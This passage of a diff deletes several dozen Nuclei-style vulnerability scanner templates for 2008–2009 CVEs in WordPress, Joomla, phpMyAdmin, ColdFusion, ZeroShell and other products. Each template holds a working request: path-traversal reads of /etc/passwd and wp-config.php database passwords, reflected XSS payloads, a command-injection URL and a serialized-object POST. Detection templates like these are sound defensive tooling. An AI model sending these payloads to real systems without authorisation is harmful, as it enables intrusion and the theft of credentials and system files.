- https://nvd.nist.gov/vuln/detail/CVE-2008-1059
|
||||
- https://web.archive.org/web/20090615225856/http://secunia.com/advisories/29099/
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
|
||||
cvss-score: 7.2
|
||||
cve-id: CVE-2008-1059
|
||||
cwe-id: CWE-79
|
||||
tags: lfi,cve,cve2008,wordpress,wp-plugin,wp,sniplets,edb,wpscan
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=../../../../wp-config.php'
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "DB_NAME"
|
||||
- "DB_PASSWORD"
|
||||
condition: and
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
# Enhanced by mp on 2022/07/29
|
|
@ -1,43 +0,0 @@
|
|||
id: CVE-2008-1061
|
||||
|
||||
info:
|
||||
name: WordPress Sniplets <=1.2.2 - Cross-Site Scripting
|
||||
author: dhiyaneshDK
|
||||
severity: high
|
||||
description: |
|
||||
WordPress Sniplets 1.1.2 and 1.2.2 plugin contains a cross-site scripting vulnerability which allows remote attackers to inject arbitrary web script or HTML via the text parameter to warning.php, notice.php, and inset.php in view/sniplets/, and possibly modules/execute.php; via the url parameter to view/admin/submenu.php; and via the page parameter to view/admin/pager.php.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/5194
|
||||
- https://wpscan.com/vulnerability/d0278ebe-e6ae-4f7c-bcad-ba318573f881
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2008-1061
|
||||
- http://securityreason.com/securityalert/3706
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
|
||||
cvss-score: 7.2
|
||||
cve-id: CVE-2008-1061
|
||||
cwe-id: CWE-79
|
||||
tags: xss,wp-plugin,wp,edb,wpscan,cve,cve2008,wordpress,sniplets
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/wp-content/plugins/sniplets/view/sniplets/warning.php?text=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "</script><script>alert(document.domain)</script>"
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- text/html
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
|
||||
# Enhanced by mp on 2022/08/31
|
|
@ -1,38 +0,0 @@
|
|||
id: CVE-2008-2398
|
||||
|
||||
info:
|
||||
name: AppServ Open Project <=2.5.10 - Cross-Site Scripting
|
||||
author: unstabl3
|
||||
severity: medium
|
||||
description: AppServ Open Project 2.5.10 and earlier contains a cross-site scripting vulnerability in index.php which allows remote attackers to inject arbitrary web script or HTML via the appservlang parameter.
|
||||
reference:
|
||||
- https://exchange.xforce.ibmcloud.com/vulnerabilities/42546
|
||||
- http://web.archive.org/web/20210121181851/https://www.securityfocus.com/bid/29291/
|
||||
- http://web.archive.org/web/20140724110348/http://secunia.com/advisories/30333/
|
||||
- http://securityreason.com/securityalert/3896
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2008-2398
|
||||
classification:
|
||||
cve-id: CVE-2008-2398
|
||||
tags: cve,cve2008,xss
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?appservlang=%3Csvg%2Fonload=confirm%28%27xss%27%29%3E"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
- type: word
|
||||
words:
|
||||
- "<svg/onload=confirm('xss')>"
|
||||
part: body
|
||||
|
||||
- type: word
|
||||
words:
|
||||
- "text/html"
|
||||
part: header
|
||||
|
||||
# Enhanced by mp on 2022/08/12
|
|
@ -1,40 +0,0 @@
|
|||
id: CVE-2008-2650
|
||||
|
||||
info:
|
||||
name: CMSimple 3.1 - Local File Inclusion
|
||||
author: pussycat0x
|
||||
severity: high
|
||||
description: |
|
||||
CMSimple 3.1 is susceptible to local file inclusion via cmsimple/cms.php when register_globals is enabled which allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the sl parameter to index.php. NOTE: this can be leveraged for remote file execution by including adm.php and then invoking the upload action. NOTE: on 20080601, the vendor patched 3.1 without changing the version number.
|
||||
reference:
|
||||
- http://www.cmsimple.com/forum/viewtopic.php?f=2&t=17
|
||||
- http://web.archive.org/web/20210121182016/https://www.securityfocus.com/bid/29450/
|
||||
- http://web.archive.org/web/20140729144732/http://secunia.com:80/advisories/30463
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2008-2650
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
|
||||
cvss-score: 8.6
|
||||
cve-id: CVE-2008-2650
|
||||
cwe-id: CWE-22
|
||||
tags: cve,cve2008,lfi,cmsimple
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
GET /index.php?sl=../../../../../../../etc/passwd%00 HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
part: body
|
||||
regex:
|
||||
- "root:.*:0:0:"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
# Enhanced by mp on 2022/07/06
|
|
@ -1,34 +0,0 @@
|
|||
id: CVE-2008-4668
|
||||
|
||||
info:
|
||||
name: Joomla! Image Browser 0.1.5 rc2 - Local File Inclusion
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Joomla! Image Browser 0.1.5 rc2 is susceptible to local file inclusion via com_imagebrowser which could allow remote attackers to include and execute arbitrary local files via a .. (dot dot) in the folder parameter to index.php.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/6618
|
||||
- https://www.cvedetails.com/cve/CVE-2008-4668
|
||||
- http://web.archive.org/web/20210121183742/https://www.securityfocus.com/bid/31458/
|
||||
- http://securityreason.com/securityalert/4464
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2008-4668
|
||||
classification:
|
||||
cve-id: CVE-2008-4668
|
||||
tags: cve,cve2008,joomla,lfi,edb
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?option=com_imagebrowser&folder=../../../../etc/passwd"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0:"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
# Enhanced by mp on 2022/07/06
|
|
@ -1,37 +0,0 @@
|
|||
id: CVE-2008-4764
|
||||
|
||||
info:
|
||||
name: Joomla! <=2.0.0 RC2 - Local File Inclusion
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Joomla! 2.0.0 RC2 and earlier are susceptible to local file inclusion in the eXtplorer module (com_extplorer) that allows remote attackers to read arbitrary files via a .. (dot dot) in the dir parameter in a show_error action.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/5435
|
||||
- https://www.cvedetails.com/cve/CVE-2008-4764
|
||||
- http://web.archive.org/web/20210121181347/https://www.securityfocus.com/bid/28764/
|
||||
- https://exchange.xforce.ibmcloud.com/vulnerabilities/41873
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2008-4764
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
|
||||
cvss-score: 8.6
|
||||
cve-id: CVE-2008-4764
|
||||
cwe-id: CWE-22
|
||||
tags: edb,cve,cve2008,joomla,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?option=com_extplorer&action=show_error&dir=..%2F..%2F..%2F%2F..%2F..%2Fetc%2Fpasswd"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0:"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
# Enhanced by mp on 2022/07/06
|
|
@ -1,36 +0,0 @@
|
|||
id: CVE-2008-5587
|
||||
|
||||
info:
|
||||
name: phpPgAdmin <=4.2.1 - Local File Inclusion
|
||||
author: dhiyaneshDK
|
||||
severity: medium
|
||||
description: phpPgAdmin 4.2.1 is vulnerable to local file inclusion in libraries/lib.inc.php when register globals is enabled. Remote attackers can read arbitrary files via a .. (dot dot) in the _language parameter to index.php.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/7363
|
||||
- http://web.archive.org/web/20210121184707/https://www.securityfocus.com/bid/32670/
|
||||
- http://web.archive.org/web/20160520063306/http://secunia.com/advisories/33014
|
||||
- http://web.archive.org/web/20151104173853/http://secunia.com/advisories/33263
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2008-5587
|
||||
classification:
|
||||
cve-id: CVE-2008-5587
|
||||
metadata:
|
||||
shodan-query: http.title:"phpPgAdmin"
|
||||
tags: cve,cve2008,lfi,phppgadmin,edb
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/phpPgAdmin/index.php?_language=../../../../../../../../etc/passwd%00'
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:[x*]:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
# Enhanced by mp on 2022/07/22
|
|
@ -1,37 +0,0 @@
|
|||
id: CVE-2008-6080
|
||||
|
||||
info:
|
||||
name: Joomla! ionFiles 4.4.2 - Local File Inclusion
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Joomla! ionFiles 4.4.2 is susceptible to local file inclusion in download.php in the ionFiles (com_ionfiles) that allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/6809
|
||||
- https://www.cvedetails.com/cve/CVE-2008-6080
|
||||
- http://web.archive.org/web/20140804231654/http://secunia.com/advisories/32377/
|
||||
- http://web.archive.org/web/20210121184101/https://www.securityfocus.com/bid/31877/
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2008-6080
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
|
||||
cvss-score: 8.6
|
||||
cve-id: CVE-2008-6080
|
||||
cwe-id: CWE-22
|
||||
tags: edb,cve,cve2008,joomla,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/components/com_ionfiles/download.php?file=../../../../../../../../etc/passwd&download=1"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0:"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
# Enhanced by mp on 2022/07/06
|
|
@ -1,33 +0,0 @@
|
|||
id: CVE-2008-6172
|
||||
|
||||
info:
|
||||
name: Joomla! Component RWCards 3.0.11 - Local File Inclusion
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: A directory traversal vulnerability in captcha/captcha_image.php in the RWCards (com_rwcards) 3.0.11 component for Joomla! when magic_quotes_gpc is disabled allows remote attackers to include and execute arbitrary local files via directory traversal sequences in the img parameter.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/6817
|
||||
- https://www.cvedetails.com/cve/CVE-2008-6172
|
||||
- http://web.archive.org/web/20140804232841/http://secunia.com/advisories/32367/
|
||||
- http://web.archive.org/web/20210121184108/https://www.securityfocus.com/bid/31892/
|
||||
classification:
|
||||
cve-id: CVE-2008-6172
|
||||
tags: cve2008,joomla,lfi,edb,cve
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/components/com_rwcards/captcha/captcha_image.php?img=../../../../../../../../../etc/passwd%00"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0:"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
# Enhanced by mp on 2022/03/30
|
|
@ -1,37 +0,0 @@
|
|||
id: CVE-2008-6222
|
||||
|
||||
info:
|
||||
name: Joomla! ProDesk 1.0/1.2 - Local File Inclusion
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Joomla! Pro Desk Support Center (com_pro_desk) component 1.0 and 1.2 allows remote attackers to read arbitrary files via a .. (dot dot) in the include_file parameter to index.php.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/6980
|
||||
- https://www.cvedetails.com/cve/CVE-2008-6222
|
||||
- http://web.archive.org/web/20111223225601/http://secunia.com/advisories/32523/
|
||||
- http://web.archive.org/web/20210121184244/https://www.securityfocus.com/bid/32113/
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2008-6222
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
|
||||
cvss-score: 8.6
|
||||
cve-id: CVE-2008-6222
|
||||
cwe-id: CWE-22
|
||||
tags: cve2008,joomla,lfi,edb,cve
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?option=com_pro_desk&include_file=../../../../../../etc/passwd"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0:"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
# Enhanced by mp on 2022/07/06
|
|
@ -1,47 +0,0 @@
|
|||
id: CVE-2008-6465
|
||||
|
||||
info:
|
||||
name: Parallels H-Sphere 3.0.0 P9/3.1 P1 - Cross-Site Scripting
|
||||
author: edoardottt
|
||||
severity: medium
|
||||
description: |
|
||||
Parallels H-Sphere 3.0.0 P9 and 3.1 P1 contains multiple cross-site scripting vulnerabilities in login.php in webshell4. An attacker can inject arbitrary web script or HTML via the err, errorcode, and login parameters, thus allowing theft of cookie-based authentication credentials and launch of other attacks.
|
||||
reference:
|
||||
- http://www.xssing.com/index.php?x=3&y=65
|
||||
- https://exchange.xforce.ibmcloud.com/vulnerabilities/45254
|
||||
- https://exchange.xforce.ibmcloud.com/vulnerabilities/45252
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2008-6465
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
|
||||
cvss-score: 5.4
|
||||
cve-id: CVE-2008-6465
|
||||
cwe-id: CWE-80
|
||||
metadata:
|
||||
verified: true
|
||||
shodan-query: title:"Parallels H-Sphere
|
||||
tags: cve,cve2008,xss,parallels,h-sphere
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/webshell4/login.php?errcode=0&login=\%22%20onfocus=alert(document.domain);%20autofocus%20\%22&err=U'
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- '\" onfocus=alert(document.domain); autofocus'
|
||||
- 'Please enter login name & password'
|
||||
condition: and
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- 'text/html'
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
# Enhanced by md on 2022/12/08
|
|
@ -1,38 +0,0 @@
|
|||
id: CVE-2008-6668
|
||||
|
||||
info:
|
||||
name: nweb2fax <=0.2.7 - Local File Inclusion
|
||||
author: geeknik
|
||||
severity: high
|
||||
description: nweb2fax 0.2.7 and earlier allow remote attackers to read arbitrary files via the id parameter submitted to comm.php and the var_filename parameter submitted to viewrq.php.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/5856
|
||||
- http://web.archive.org/web/20210130035550/https://www.securityfocus.com/bid/29804
|
||||
- https://exchange.xforce.ibmcloud.com/vulnerabilities/43173
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2008-6668
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
|
||||
cvss-score: 8.6
|
||||
cve-id: CVE-2008-6668
|
||||
cwe-id: CWE-22
|
||||
tags: cve2008,nweb2fax,lfi,traversal,edb,cve
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/comm.php?id=../../../../../../../../../../etc/passwd"
|
||||
- "{{BaseURL}}/viewrq.php?format=ps&var_filename=../../../../../../../../../../etc/passwd"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
part: body
|
||||
regex:
|
||||
- "root:.*:0:0:"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
# Enhanced by mp on 2022/07/06
|
|
@ -1,43 +0,0 @@
|
|||
id: CVE-2008-6982
|
||||
|
||||
info:
|
||||
name: Devalcms 1.4a - Cross-Site Scripting
|
||||
author: arafatansari
|
||||
severity: high
|
||||
description: |
|
||||
Devalcms 1.4a contains a cross-site scripting vulnerability in the currentpath parameter of the index.php file.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/6369
|
||||
- http://sourceforge.net/projects/devalcms/files/devalcms/devalcms-1.4b/devalcms-1.4b.zip/download
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2008-6982
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
|
||||
cvss-score: 7.2
|
||||
cve-id: CVE-2008-6982
|
||||
cwe-id: CWE-79
|
||||
metadata:
|
||||
verified: "true"
|
||||
tags: cve,cve2008,devalcms,xss,cms,edb
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/index.php?currentpath=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- 'sub menu for: <script>alert(document.domain)</script>'
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- text/html
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 500
|
||||
|
||||
# Enhanced by md on 2022/09/20
|
|
@ -1,28 +0,0 @@
|
|||
id: CVE-2009-0545
|
||||
|
||||
info:
|
||||
name: ZeroShell <= 1.0beta11 Remote Code Execution
|
||||
author: geeknik
|
||||
severity: critical
|
||||
description: ZeroShell 1.0beta11 and earlier via cgi-bin/kerbynet allows remote attackers to execute arbitrary commands through shell metacharacters in the type parameter in a NoAuthREQ x509List action.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/8023
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2009-0545
|
||||
- http://www.zeroshell.net/eng/announcements/
|
||||
- http://www.ikkisoft.com/stuff/LC-2009-01.txt
|
||||
classification:
|
||||
cve-id: CVE-2009-0545
|
||||
tags: edb,cve,cve2009,zeroshell,kerbynet,rce
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509List&type=*%22;/root/kerbynet.cgi/scripts/getkey%20../../../etc/passwd;%22"
|
||||
|
||||
matchers:
|
||||
- type: regex
|
||||
part: body
|
||||
regex:
|
||||
- "root:.*:0:0:"
|
||||
|
||||
# Enhanced by mp on 2022/04/18
|
|
@ -1,36 +0,0 @@
|
|||
id: CVE-2009-0932
|
||||
|
||||
info:
|
||||
name: Horde/Horde Groupware - Local File Inclusion
|
||||
author: pikpikcu
|
||||
severity: high
|
||||
description: Horde before 3.2.4 and 3.3.3 and Horde Groupware before 1.1.5 are susceptible to local file inclusion in framework/Image/Image.php because it allows remote attackers to include and execute arbitrary local files via directory traversal sequences in the Horde_Image driver name.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/16154
|
||||
- http://cvs.horde.org/co.php/groupware/docs/groupware/CHANGES?r=1.28.2.5
|
||||
- http://web.archive.org/web/20161228102217/http://secunia.com/advisories/33695
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2009-0932?cpeVersion=2.2
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
|
||||
cvss-score: 8.6
|
||||
cve-id: CVE-2009-0932
|
||||
cwe-id: CWE-22
|
||||
tags: cve,cve2009,horde,lfi,traversal,edb
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/horde/util/barcode.php?type=../../../../../../../../../../../etc/./passwd%00"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0:"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
# Enhanced by mp on 2022/07/06
|
|
@ -1,42 +0,0 @@
|
|||
id: CVE-2009-1151
|
||||
|
||||
info:
|
||||
name: PhpMyAdmin Scripts - Remote Code Execution
|
||||
author: princechaddha
|
||||
severity: critical
|
||||
description: PhpMyAdmin Scripts 2.11.x before 2.11.9.5 and 3.x before 3.1.3.1 are susceptible to a remote code execution in setup.php that allows remote attackers to inject arbitrary PHP code into a configuration file via the save action. Combined with the ability to save files on server, this can allow unauthenticated users to execute arbitrary PHP code.
|
||||
reference:
|
||||
- https://www.phpmyadmin.net/security/PMASA-2009-3/
|
||||
- https://github.com/vulhub/vulhub/tree/master/phpmyadmin/WooYun-2016-199433
|
||||
- http://phpmyadmin.svn.sourceforge.net/viewvc/phpmyadmin/branches/MAINT_2_11_9/phpMyAdmin/scripts/setup.php?r1=11514&r2=12301&pathrev=12301
|
||||
- http://www.phpmyadmin.net/home_page/security/PMASA-2009-3.php
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2009-1151
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
|
||||
cvss-score: 10
|
||||
cve-id: CVE-2009-1151
|
||||
cwe-id: CWE-77
|
||||
tags: deserialization,kev,vulhub,cve,cve2009,phpmyadmin,rce
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
POST /scripts/setup.php HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Accept-Encoding: gzip, deflate
|
||||
Accept: */*
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
|
||||
action=test&configuration=O:10:"PMA_Config":1:{s:6:"source",s:11:"/etc/passwd";}
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0:"
|
||||
|
||||
# Enhanced by mp on 2022/07/06
|
|
@ -1,36 +0,0 @@
|
|||
id: CVE-2009-1496
|
||||
|
||||
info:
|
||||
name: Joomla! Cmimarketplace 0.1 - Local File Inclusion
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: |
|
||||
Joomla! Cmimarketplace 0.1 is susceptible to local file inclusion because com_cmimarketplace allows remote attackers to list arbitrary directories via a .. (dot dot) in the viewit parameter to index.php.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/8367
|
||||
- http://web.archive.org/web/20210121190149/https://www.securityfocus.com/bid/34431/
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2009-1496
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
|
||||
cvss-score: 8.6
|
||||
cve-id: CVE-2009-1496
|
||||
cwe-id: CWE-22
|
||||
tags: joomla,lfi,edb,cve,cve2009
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?option=com_cmimarketplace&Itemid=70&viewit=/../../../../../../etc/passwd&cid=1"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0:"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
# Enhanced by mp on 2022/07/06
|
|
@ -1,36 +0,0 @@
|
|||
id: CVE-2009-1558
|
||||
|
||||
info:
|
||||
name: Cisco Linksys WVC54GCA 1.00R22/1.00R24 - Local File Inclusion
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Cisco Linksys WVC54GCA 1.00R22/1.00R24 is susceptible to local file inclusion in adm/file.cgi because it allows remote attackers to read arbitrary files via a %2e. (encoded dot dot) or an absolute pathname in the next_file parameter.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/32954
|
||||
- https://web.archive.org/web/20210119151410/http://www.securityfocus.com/bid/34713
|
||||
- http://www.vupen.com/english/advisories/2009/1173
|
||||
- http://www.gnucitizen.org/blog/hacking-linksys-ip-cameras-pt-3/
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2009-1558
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
|
||||
cvss-score: 8.6
|
||||
cve-id: CVE-2009-1558
|
||||
cwe-id: CWE-22
|
||||
tags: cve,iot,linksys,camera,traversal,cve2009,lfi,cisco,firmware,edb
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/adm/file.cgi?next_file=%2fetc%2fpasswd"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0:"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
# Enhanced by mp on 2022/07/06
|
|
@ -1,42 +0,0 @@
|
|||
id: CVE-2009-1872
|
||||
|
||||
info:
|
||||
name: Adobe Coldfusion <=8.0.1 - Cross-Site Scripting
|
||||
author: princechaddha
|
||||
severity: medium
|
||||
description: Adobe ColdFusion Server 8.0.1 and earlier contain multiple cross-site scripting vulnerabilities which allow remote attackers to inject arbitrary web script or HTML via (1) the startRow parameter to administrator/logviewer/searchlog.cfm, or the query string to (2) wizards/common/_logintowizard.cfm, (3) wizards/common/_authenticatewizarduser.cfm, or (4) administrator/enter.cfm.
|
||||
reference:
|
||||
- https://web.archive.org/web/20201208121904/https://www.securityfocus.com/archive/1/505803/100/0/threaded
|
||||
- https://www.tenable.com/cve/CVE-2009-1872
|
||||
- http://www.adobe.com/support/security/bulletins/apsb09-12.html
|
||||
- http://www.dsecrg.com/pages/vul/show.php?id=122
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2009-1872
|
||||
classification:
|
||||
cve-id: CVE-2009-1872
|
||||
metadata:
|
||||
shodan-query: http.component:"Adobe ColdFusion"
|
||||
verified: "true"
|
||||
tags: cve,cve2009,adobe,xss,coldfusion,tenable
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/CFIDE/wizards/common/_logintowizard.cfm?%22%3E%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E'
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "</script><script>alert(document.domain)</script>"
|
||||
part: body
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- text/html
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
# Enhanced by mp on 2022/08/12
|
|
@ -1,37 +0,0 @@
|
|||
id: CVE-2009-2015
|
||||
|
||||
info:
|
||||
name: Joomla! MooFAQ 1.0 - Local File Inclusion
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Joomla! Ideal MooFAQ 1.0 via com_moofaq allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter (local file inclusion).
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/8898
|
||||
- https://www.cvedetails.com/cve/CVE-2009-2015
|
||||
- http://web.archive.org/web/20210121191105/https://www.securityfocus.com/bid/35259/
|
||||
- http://www.vupen.com/english/advisories/2009/1530
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2009-2015
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
|
||||
cvss-score: 8.6
|
||||
cve-id: CVE-2009-2015
|
||||
cwe-id: CWE-22
|
||||
tags: joomla,lfi,edb,cve,cve2009
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/components/com_moofaq/includes/file_includer.php?gzip=0&file=/../../../../../etc/passwd"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0:"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
# Enhanced by mp on 2022/07/06
|
|
@ -1,37 +0,0 @@
|
|||
id: CVE-2009-2100
|
||||
|
||||
info:
|
||||
name: Joomla! JoomlaPraise Projectfork 2.0.10 - Local File Inclusion
|
||||
author: daffainfo
|
||||
severity: high
|
||||
